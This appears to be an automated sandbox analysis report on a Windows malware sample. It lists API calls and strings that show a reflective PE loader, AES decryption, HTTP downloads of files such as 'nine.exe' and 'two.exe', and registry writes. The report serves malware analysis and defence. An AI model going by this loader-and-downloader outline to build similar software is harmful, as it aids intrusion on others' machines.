API calls 53180->53185 53503 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53181->53503 53187 406cc2 53182->53187 53184 406e9b 53189 4021f0 25 API calls 53184->53189 53185->52947 53187->52947 53480 408090 39 API calls 2 library calls 53187->53480 53188 4022c0 27 API calls 53188->53197 53191 406ea3 53189->53191 53190 406ef5 53192 4021f0 25 API calls 53190->53192 53500 4086d0 39 API calls 2 library calls 53191->53500 53195 406efd 53192->53195 53504 408850 39 API calls 2 library calls 53195->53504 53197->53174 53197->53188 53198 407113 53197->53198 53202 407102 53197->53202 53199 4021f0 25 API calls 53198->53199 53201 40711b 53199->53201 53200 406f02 53208 4022c0 27 API calls 53200->53208 53204 40a850 27 API calls 53201->53204 53205 4021f0 25 API calls 53202->53205 53203 406ea8 53206 4022c0 27 API calls 53203->53206 53207 40712f 53204->53207 53205->53174 53206->53032 53210 40a850 27 API calls 53207->53210 53209 406f12 53208->53209 53505 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53209->53505 53212 407148 53210->53212 53214 40a850 27 API calls 53212->53214 53213 406f1b 53215 4021f0 25 API calls 53213->53215 53218 40715b 53214->53218 53216 406f23 53215->53216 53506 4088d0 39 API calls 2 library calls 53216->53506 53219 40a850 27 API calls 53218->53219 53221 40718b 53218->53221 53219->53221 53509 408b00 39 API calls 2 library calls 53221->53509 53222 407198 53223 4022c0 27 API calls 53222->53223 53224 4071a8 53223->53224 53225 4021f0 25 API calls 53224->53225 53226 4071bc 53225->53226 53227 407260 53226->53227 53228 401670 27 API calls 53226->53228 53512 408c70 39 API calls 2 library calls 53227->53512 53230 4071d7 53228->53230 53510 408b90 39 API calls 2 library calls 53230->53510 53231 407265 53234 4022c0 27 API calls 53231->53234 53233 4071e0 53236 4022c0 27 API calls 53233->53236 53235 407278 53234->53235 53237 4021f0 25 API calls 53235->53237 53240 4071f0 53236->53240 53238 40728f 53237->53238 53239 4072ef 53238->53239 53513 408de0 39 
API calls 2 library calls 53238->53513 53242 4045e0 23 API calls 53239->53242 53245 407227 53240->53245 53246 407218 Sleep 53240->53246 53244 407300 53242->53244 53243 4072a0 53249 4022c0 27 API calls 53243->53249 53250 4022c0 27 API calls 53245->53250 53246->53240 53247 407225 53246->53247 53248 407249 53247->53248 53251 4021f0 25 API calls 53248->53251 53252 4072af 53249->53252 53253 40723e 53250->53253 53254 407251 53251->53254 53514 408d60 39 API calls 2 library calls 53252->53514 53256 4021f0 25 API calls 53253->53256 53511 4016d0 CoUninitialize 53254->53511 53256->53248 53258 4072c3 53259 4022c0 27 API calls 53258->53259 53260 4072d2 53259->53260 53515 408d00 39 API calls __Init_thread_footer 53260->53515 53262 4072e0 53263 4022c0 27 API calls 53262->53263 53263->53239 53265 40a87b 53264->53265 53266 40a882 53265->53266 53267 40a8d4 53265->53267 53268 40a8b5 53265->53268 53266->52722 53275 40a8c9 _Yarn 53267->53275 53621 4015c0 27 API calls 4 library calls 53267->53621 53269 40a90a 53268->53269 53270 40a8bc 53268->53270 53622 4015c0 27 API calls 2 library calls 53269->53622 53620 4015c0 27 API calls 4 library calls 53270->53620 53274 40a8c2 53274->53275 53276 411337 25 API calls 53274->53276 53275->52722 53277 40a914 53276->53277 53623 409bf0 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53277->53623 53279 40a92b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53279->52722 53280->52722 53281->52746 53282->52758 53283->52752 53284->52781 53285->52762 53286->52772 53287->52765 53288->52781 53289->52728 53290->52738 53291->52731 53292->52753 53293->52747 53294->52766 53296 404171 53295->53296 53297 404169 53295->53297 53296->52807 53299 404180 53297->53299 53313 40e393 RaiseException 53297->53313 53314 40e393 RaiseException 53299->53314 53301 4041bf 53315 40e131 26 API calls 3 library calls 53301->53315 53303 4041e4 53303->52807 53304->52809 53305->52811 53306->52814 53307->52817 53308->52819 53309->52830 53310->52823 53312->52830 53313->53299 53314->53301 
53315->53303 53317 40bf70 53316->53317 53318 40bf42 53316->53318 53322 40bf7c 53317->53322 53324 40bfa0 27 API calls 53317->53324 53319 404150 27 API calls 53318->53319 53320 40bf5c 53319->53320 53320->52841 53322->52841 53323->52841 53324->53322 53326 414f3c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 53325->53326 53326->52844 53516 418e23 GetLastError 53327->53516 53331 414ee8 53330->53331 53333 414ef2 53330->53333 53554 414dd6 41 API calls 2 library calls 53331->53554 53333->52875 53335 404491 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53334->53335 53336 40a850 27 API calls 53335->53336 53337 404515 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53335->53337 53342 4045d7 53335->53342 53336->53335 53337->53342 53343 404571 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53337->53343 53555 40b620 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53337->53555 53338 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53340 4045d3 53338->53340 53340->52875 53341 40452d 53341->53342 53341->53343 53344 411337 25 API calls 53342->53344 53343->53338 53345 4045dc 53344->53345 53347 40b988 53346->53347 53350 40b91a _Yarn 53346->53350 53556 40bd10 27 API calls 4 library calls 53347->53556 53349 40b99a 53349->52875 53350->52875 53352 401d72 53351->53352 53352->53352 53353 402460 27 API calls 53352->53353 53354 401d85 53353->53354 53355 402460 27 API calls 53354->53355 53356 401e4d _Yarn 53355->53356 53557 411414 53356->53557 53359 401f83 53360 401ff3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53359->53360 53362 402022 53359->53362 53361 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53360->53361 53363 402017 53361->53363 53364 411337 25 API calls 53362->53364 53363->52875 53365 402027 53364->53365 53366 401d20 39 API calls 53365->53366 53368 40736e 53367->53368 53369 40733c 53367->53369 53370 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53368->53370 53586 40d10c 6 API calls 53369->53586 53372 407380 53370->53372 
53372->52856 53373 407346 53373->53368 53587 40d41e 28 API calls 53373->53587 53375 407364 53588 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 53375->53588 53378 4022e3 53377->53378 53379 402460 27 API calls 53378->53379 53380 4022f5 53379->53380 53380->52859 53382 4021fb 53381->53382 53383 402216 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53381->53383 53382->53383 53384 411337 25 API calls 53382->53384 53383->52863 53385 40223a 53384->53385 53386 402271 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53385->53386 53387 411337 25 API calls 53385->53387 53386->52863 53388 4022bc 53387->53388 53390 401683 __FrameHandler3::FrameUnwindToState 53389->53390 53391 40cfd1 27 API calls 53390->53391 53392 40169a __FrameHandler3::FrameUnwindToState 53391->53392 53392->52958 53394 408aa2 53393->53394 53402 408ade 53393->53402 53589 40d10c 6 API calls 53394->53589 53395 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53397 408af0 53395->53397 53397->52966 53398 408aac 53398->53402 53590 40d41e 28 API calls 53398->53590 53400 408ad4 53591 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 53400->53591 53402->53395 53404 408a1c 53403->53404 53412 408a4e 53403->53412 53592 40d10c 6 API calls 53404->53592 53405 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53407 408a60 53405->53407 53407->52985 53408 408a26 53408->53412 53593 40d41e 28 API calls 53408->53593 53410 408a44 53594 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 53410->53594 53412->53405 53414 4089d2 53413->53414 53415 40898d 53413->53415 53417 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53414->53417 53595 40d10c 6 API calls 53415->53595 53419 4089e5 53417->53419 53418 408997 53418->53414 53596 40d41e 28 API calls 53418->53596 53419->53006 53421 4089c8 53597 40d0c2 EnterCriticalSection LeaveCriticalSection 
RtlWakeAllConditionVariable SetEvent ResetEvent 53421->53597 53424 40ad12 53423->53424 53425 40b900 27 API calls 53424->53425 53426 406fda 53425->53426 53427 40ad60 53426->53427 53428 40ad79 53427->53428 53429 40ad8d _Yarn 53428->53429 53598 402730 27 API calls 4 library calls 53428->53598 53429->53046 53599 40b720 53431->53599 53433 407007 53433->53066 53434->52875 53435->52875 53436->52875 53438 414d8d 23 API calls 53437->53438 53439 4045e7 53438->53439 53440->52892 53442->52876 53443->52894 53444->52914 53445->52930 53446->52947 53447->52878 53448->52897 53449->52912 53450->52933 53451->52947 53452->52869 53453->52907 53454->52923 53455->52939 53456->52959 53457->52973 53458->53013 53459->53012 53460->53013 53461->52908 53462->52944 53463->52963 53464->52975 53465->52993 53466->53016 53467->53013 53468->53071 53469->52936 53470->52945 53471->52979 53472->52999 53473->53020 53474->53044 53475->53070 53476->53096 53477->53112 53478->53156 53479->53162 53480->52972 53481->52978 53482->53023 53483->53048 53484->53075 53485->53101 53486->53118 53487->53144 53488->53022 53489->53079 53490->53105 53491->53123 53492->53150 53493->53167 53494->53180 53495->53078 53496->53127 53497->53154 53498->53169 53499->53184 53500->53203 53501->53129 53502->53170 53503->53190 53504->53200 53505->53213 53506->53203 53507->53047 53508->52949 53509->53222 53510->53233 53512->53231 53513->53243 53514->53258 53515->53262 53517 418e40 53516->53517 53518 418e3a 53516->53518 53522 418e46 SetLastError 53517->53522 53547 419bb2 6 API calls std::_Lockit::_Lockit 53517->53547 53546 419b73 6 API calls std::_Lockit::_Lockit 53518->53546 53521 418e5e 53521->53522 53523 418e62 53521->53523 53529 406428 Sleep 53522->53529 53530 418eda 53522->53530 53548 41968b 14 API calls 3 library calls 53523->53548 53525 418e6e 53527 418e76 53525->53527 53528 418e8d 53525->53528 53549 419bb2 6 API calls std::_Lockit::_Lockit 53527->53549 53550 419bb2 6 API calls std::_Lockit::_Lockit 53528->53550 53529->52847 
53553 4160b9 37 API calls __FrameHandler3::FrameUnwindToState 53530->53553 53535 418e99 53537 418e9d 53535->53537 53538 418eae 53535->53538 53536 418e84 53539 4196e8 _free 14 API calls 53536->53539 53551 419bb2 6 API calls std::_Lockit::_Lockit 53537->53551 53552 418c51 14 API calls __Getctype 53538->53552 53542 418e8a 53539->53542 53542->53522 53543 418eb9 53544 4196e8 _free 14 API calls 53543->53544 53545 418ec0 53544->53545 53545->53522 53546->53517 53547->53521 53548->53525 53549->53536 53550->53535 53551->53536 53552->53543 53554->53333 53555->53341 53556->53349 53560 419075 53557->53560 53564 419089 53560->53564 53561 41908d 53562 401e98 InternetOpenA 53561->53562 53579 411401 14 API calls __dosmaperr 53561->53579 53562->53359 53564->53561 53564->53562 53566 4190c7 53564->53566 53565 4190b7 53580 411327 25 API calls _mbstowcs 53565->53580 53581 411431 37 API calls 2 library calls 53566->53581 53569 4190d3 53570 4190dd 53569->53570 53573 4190f4 53569->53573 53582 421f0d 25 API calls 2 library calls 53570->53582 53572 419176 53572->53562 53583 411401 14 API calls __dosmaperr 53572->53583 53573->53572 53574 4191cb 53573->53574 53574->53562 53585 411401 14 API calls __dosmaperr 53574->53585 53577 4191bf 53584 411327 25 API calls _mbstowcs 53577->53584 53579->53565 53580->53562 53581->53569 53582->53562 53583->53577 53584->53562 53585->53562 53586->53373 53587->53375 53588->53368 53589->53398 53590->53400 53591->53402 53592->53408 53593->53410 53594->53412 53595->53418 53596->53421 53597->53414 53598->53429 53600 40b763 53599->53600 53601 40b8f0 53600->53601 53602 40b830 53600->53602 53608 40b768 _Yarn 53600->53608 53618 401660 27 API calls 53601->53618 53606 40b865 53602->53606 53607 40b88b 53602->53607 53604 40b8f5 53619 4015c0 27 API calls 2 library calls 53604->53619 53606->53604 53610 40b870 53606->53610 53615 40b87d _Yarn 53607->53615 53617 4015c0 27 API calls 4 library calls 53607->53617 53608->53433 53609 40b876 53612 411337 25 API calls 53609->53612 
53609->53615 53616 4015c0 27 API calls 4 library calls 53610->53616 53614 40b8ff 53612->53614 53615->53433 53616->53609 53617->53615 53619->53609 53620->53274 53621->53275 53622->53274 53623->53279 53625 414c39 53624->53625 53626 414c4b 53624->53626 53652 40d906 GetModuleHandleW 53625->53652 53636 414ad2 53626->53636 53629 414c3e 53629->53626 53653 414cd1 GetModuleHandleExW 53629->53653 53631 40d66b 53631->52790 53635 414c8e 53637 414ade __FrameHandler3::FrameUnwindToState 53636->53637 53659 414fa9 EnterCriticalSection 53637->53659 53639 414ae8 53660 414b3e 53639->53660 53641 414af5 53664 414b13 53641->53664 53644 414c8f 53669 41b919 GetPEB 53644->53669 53647 414cbe 53650 414cd1 __FrameHandler3::FrameUnwindToState 3 API calls 53647->53650 53648 414c9e GetPEB 53648->53647 53649 414cae GetCurrentProcess TerminateProcess 53648->53649 53649->53647 53651 414cc6 ExitProcess 53650->53651 53652->53629 53654 414cf0 GetProcAddress 53653->53654 53655 414d13 53653->53655 53658 414d05 53654->53658 53656 414c4a 53655->53656 53657 414d19 FreeLibrary 53655->53657 53656->53626 53657->53656 53658->53655 53659->53639 53661 414b4a __FrameHandler3::FrameUnwindToState 53660->53661 53662 414bab __FrameHandler3::FrameUnwindToState 53661->53662 53667 416f1d 14 API calls __FrameHandler3::FrameUnwindToState 53661->53667 53662->53641 53668 414ff1 LeaveCriticalSection 53664->53668 53666 414b01 53666->53631 53666->53644 53667->53662 53668->53666 53670 41b933 53669->53670 53671 414c99 53669->53671 53673 419a42 5 API calls std::_Lockit::_Lockit 53670->53673 53671->53647 53671->53648 53673->53671 53674 66003c 53675 660049 53674->53675 53689 660e0f SetErrorMode SetErrorMode 53675->53689 53680 660265 53681 6602ce VirtualProtect 53680->53681 53682 66030b 53681->53682 53683 660439 VirtualFree 53682->53683 53687 6605f4 LoadLibraryA 53683->53687 53688 6604be 53683->53688 53684 6604e3 LoadLibraryA 53684->53688 53686 6608c7 53687->53686 53688->53684 53688->53687 53690 660223 53689->53690 53691 660d90 
53690->53691 53692 660dad 53691->53692 53693 660238 VirtualAlloc 53692->53693 53694 660dbb GetPEB 53692->53694 53693->53680 53694->53693

                                                  Control-flow Graph (first block 402c60-402c82; node and edge listing omitted)
                                                  APIs
                                                  • SetLastError.KERNEL32(0000000D), ref: 00402C86
                                                  • SetLastError.KERNEL32(000000C1), ref: 00402CC8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID: ,@$ ,@$@$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$P,@0,@ ,@$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                  • API String ID: 1452528299-90842840
                                                  • Opcode ID: a8622f64d8070585d512a72ec777aab289d6801d447c326e6b8095fd7aed850a
                                                  • Instruction ID: d1ae0cd5652749efb72fafdd6d36f3c4f1fa47aae7819869a3385d061891a2f5
                                                  • Opcode Fuzzy Hash: a8622f64d8070585d512a72ec777aab289d6801d447c326e6b8095fd7aed850a
                                                  • Instruction Fuzzy Hash: E112AB71A012059BDB14CFA9D984BAEB7B5BF48304F14417AE809BB3C5D7B8ED41CB98

                                                  Control-flow Graph (first block 4034b0-403538; node and edge listing omitted)
                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,5BDF3532), ref: 00403530
                                                  • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403554
                                                  • _mbstowcs.LIBCMT ref: 004035A7
                                                  • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035BE
                                                  • GetLastError.KERNEL32 ref: 004035C8
                                                  • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004035F0
                                                  • GetLastError.KERNEL32 ref: 004035FA
                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040360A
                                                  • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036CC
                                                  • CryptDestroyKey.ADVAPI32(?), ref: 0040373E
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 004037BE
                                                  Strings
                                                  • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040350C, 004037A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
                                                  • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                  • API String ID: 4265767208-63410773
                                                  • Opcode ID: 7b998e777f9dba12feb14bf4fe2aca7bea4611c124f2976cea3106fcf7bfb3b9
                                                  • Instruction ID: 95a2a36aee1ec4de7b2520a7f89bd3df41077e598d0595e4efdc36d1890455ca
                                                  • Opcode Fuzzy Hash: 7b998e777f9dba12feb14bf4fe2aca7bea4611c124f2976cea3106fcf7bfb3b9
                                                  • Instruction Fuzzy Hash: 898193B1A00218AFEB208F25CC45B9EBBB9EF45310F4081BAF54DE7291DB359E858F55

                                                  Control-flow Graph (first block 408e60-408ec3; node and edge listing omitted)
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00408FE4
                                                  • __Init_thread_footer.LIBCMT ref: 0040927E
                                                  • __Init_thread_footer.LIBCMT ref: 004090CA
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  • __Init_thread_footer.LIBCMT ref: 0040946F
                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040963D
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$Init_thread_footer$EnterLeave$ConditionFileIos_base_dtorModuleNameVariableWakestd::ios_base::_
                                                  • String ID: GET$NOSUB$ZYA.$kc~z$nine.exe$two.exe
                                                  • API String ID: 2716318523-155817423
                                                  • Opcode ID: c88f92c882b648590cba2f2499e70da6b29ef9d5d5b97d2e5ff23a0a3304e30a
                                                  • Instruction ID: b8017e68b8cd19ffbf6244ec68e5bce9a373ae63186eb1a6feb7d55068310508
                                                  • Opcode Fuzzy Hash: c88f92c882b648590cba2f2499e70da6b29ef9d5d5b97d2e5ff23a0a3304e30a
                                                  • Instruction Fuzzy Hash: 0942F5719103049BDB14DF28DD89BAAB7B1BB49304F1042EEE449673D2DB79AE84CF49

                                                  Control-flow Graph (first block 402940-402957; node and edge listing omitted)
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 004029E8
                                                  • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 004029FD
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A0B
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A26
                                                  • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A45
                                                  • LocalFree.KERNEL32(00000000), ref: 00402A52
                                                  • LocalFree.KERNEL32(?), ref: 00402A57
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                  • String ID: %s: %s$Error protecting memory page
                                                  • API String ID: 839691724-1484484497
                                                  • Opcode ID: 5db2cce3fd63739b711254987153777c537def3ef7a5a6feb85d6925e6d193cb
                                                  • Instruction ID: e8b4d11ea5ec4951a28bd1c843c991d4af80b6875fe3e076a8189f470f5303fb
                                                  • Opcode Fuzzy Hash: 5db2cce3fd63739b711254987153777c537def3ef7a5a6feb85d6925e6d193cb
                                                  • Instruction Fuzzy Hash: 333103B2B01104AFDB109F68DC44F6EB7A8EF44710F4541BEE905EB2D1DB75AD068B88

                                                  Control-flow Graph (first block 401840-401903; node and edge listing omitted)
                                                  APIs
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004018C5
                                                  • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004018E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FileInternet$PointerRead
                                                  • String ID: text
                                                  • API String ID: 3197321146-999008199
                                                  • Opcode ID: d39032ca1dc0b9f69d1bb390edc8543737ea8d5becb6f7b64ce9485d89a3947a
                                                  • Instruction ID: 48e4c645a74c51e6b7fa04efd3e880018ef5ff171affb454254e0df7a66f96b1
                                                  • Opcode Fuzzy Hash: d39032ca1dc0b9f69d1bb390edc8543737ea8d5becb6f7b64ce9485d89a3947a
                                                  • Instruction Fuzzy Hash: 22C17C70A002189FEB25CF24CD85BEAB7B5FF48304F1041ADE409A72A1DB75AE85CF54

                                                  Control-flow Graph (first block 414c8f-414c9c; node and edge listing omitted)
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,00414C8E,00000000,7622DF80,?,00000000,?,004190D3), ref: 00414CB1
                                                  • TerminateProcess.KERNEL32(00000000,?,00414C8E,00000000,7622DF80,?,00000000,?,004190D3), ref: 00414CB8
                                                  • ExitProcess.KERNEL32 ref: 00414CCA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                  • Instruction ID: 5ca820ed295d6e044a5f1fab1df988cbd5672b183a1e8dae9fa6470a94bd119c
                                                  • Opcode Fuzzy Hash: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                  • Instruction Fuzzy Hash: A6E04631102118AFCB216B14CD09AAD3B69EB80791B410429F80486231DF39DDA3DEC8

                                                  Control-flow Graph (first block 774b01-774b1a; node and edge listing omitted)
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00774B29
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00774B49
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0076F000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_76f000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: 85ca7d497bcee8b21d9e67fa15fbda6fc6d288a5ec82bc9caf14efd52d85f4b3
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: A9F09671600710ABDB203BF9A88DB6EB6ECAF49765F104528E64AD24D0DB74EC4546A1

                                                  Control-flow Graph (first block 4063d0-406477; node and edge listing omitted)
                                                  APIs
                                                    • Part of subcall function 00414F0A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040591F,00000000,5BDF3532), ref: 00414F1D
                                                    • Part of subcall function 00414F0A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F4E
                                                  • Sleep.KERNELBASE(000003E8,?,7712D120), ref: 00406430
                                                  • __Init_thread_footer.LIBCMT ref: 00406662
                                                  • Sleep.KERNEL32(00000BB8,00000000,?,00438C00,00438ED4,00438ED5,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 0040686A
                                                    • Part of subcall function 00407390: __Init_thread_footer.LIBCMT ref: 004073F9
                                                    • Part of subcall function 00407420: __Init_thread_footer.LIBCMT ref: 0040747A
                                                  • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,00433998,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 0040710F
                                                  • Sleep.KERNEL32(00000BB8,00000000,00000000,00433998), ref: 0040721D
                                                    • Part of subcall function 00408C70: __Init_thread_footer.LIBCMT ref: 00408CD9
                                                    • Part of subcall function 00408DE0: __Init_thread_footer.LIBCMT ref: 00408E39
                                                    • Part of subcall function 00408D60: __Init_thread_footer.LIBCMT ref: 00408DB9
                                                    • Part of subcall function 00408D00: __Init_thread_footer.LIBCMT ref: 00408D51
                                                    • Part of subcall function 004063D0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004062A3
                                                    • Part of subcall function 004063D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004062C5
                                                    • Part of subcall function 004063D0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004062ED
                                                    • Part of subcall function 004063D0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004062F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer$Sleep$Time$CloseCreateFileOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                                  • String ID: @BAO$O@K\$SUB=$Y@BA$ZK\.$get$mixone$rmBK$updateSW$>
                                                  • API String ID: 1876388665-2074545787
                                                  • Opcode ID: c9853fe243ca87616cf0691cce8571791723dccf944e3495869a65eaa89bf389
                                                  • Instruction ID: 5f27ce350e39438f477c09faef13317f674b6310b8c83854bcab6de2c29012ff
                                                  • Opcode Fuzzy Hash: c9853fe243ca87616cf0691cce8571791723dccf944e3495869a65eaa89bf389
                                                  • Instruction Fuzzy Hash: 19829571D102049ACB15FBB5D95AAEEB3746F14308F10817FE412771D2EE7C6A48CBAA

                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                  • __cftof.LIBCMT ref: 10001624
                                                  • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                  • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                  • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                  • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                  Strings
                                                  Memory Dump Source
